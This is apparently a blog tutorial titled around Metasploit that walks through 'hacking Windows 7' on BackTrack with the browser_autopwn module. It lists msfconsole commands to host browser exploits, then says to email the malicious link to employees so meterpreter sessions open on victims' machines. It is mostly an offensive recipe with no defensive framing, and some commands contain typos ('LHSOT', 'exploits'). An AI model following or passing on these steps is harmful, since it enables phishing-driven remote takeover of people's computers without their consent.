What is Metasploit?
Metasploit is a framework which is used for the hacking of different kinds of applications, operating systems, web applications etc. Metasploit contains various exploits, scanners, payloads, modules, auxiliaires, vulnerability assessments etc.
Requirements:-
VULNERABILITY
EXPLOIT
PAYLOAD
Vulnerability is a weakness or hole of the system through which an attacker enters into the machine.
Exploit is a program or code which takes the advantage of the vulnerability to break the security of system.
Payload is a program which gives control of the system.
Step 1 –
Power on your Backtrack Operating System with
Username=root and Password=toor (By Default)
After login to this, Type “startx” for entering into GUI Mode.
Step 2 –
Now For Hacking Windows, You have to Start Metasploit Framework.
So Open your terminal and type this command,
root@bt:~# msfconsole
Step 3 –
Now For hacking windows 7, we use this exploit named as browser Autopwn
root@bt:~# use auxiliary/server/browser_autopwn
The basic idea behind this module is that it creates a web server in our local machine which will contain different kind of browser exploits.
When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.
Step 4 –
Now Type “show options” to check all options related to this exploit
Step 5 –
Now Set your local host IP by typing this command,
root@bt:~# set LHSOT 192.168.17.133
To set Port, type this command,
root@bt:~# set SRVPORT 80
In order to prevent Metasploit to set up random URL’s, we use URIPATH
root@bt:~# set URIPATH /
Step 6 –
Now type “exploits” command
After the execution of this module we will notice that different exploits for a variety of browsers will start loading to our web server.
Now we can share the link through our email to our client employees.
Step 7 –
If any user opens the malicious link, the Autopwn module will try all these exploits in order to see if it can break into the client.
If the browser is vulnerable to any of these exploits meterpreter sessions will open.
To check all sessions, type this command,
root@bt:~# sessions -i
Step 8 –
To Open First Session, type this command
root@bt:~# sessions –i 1
0 comments:
Post a Comment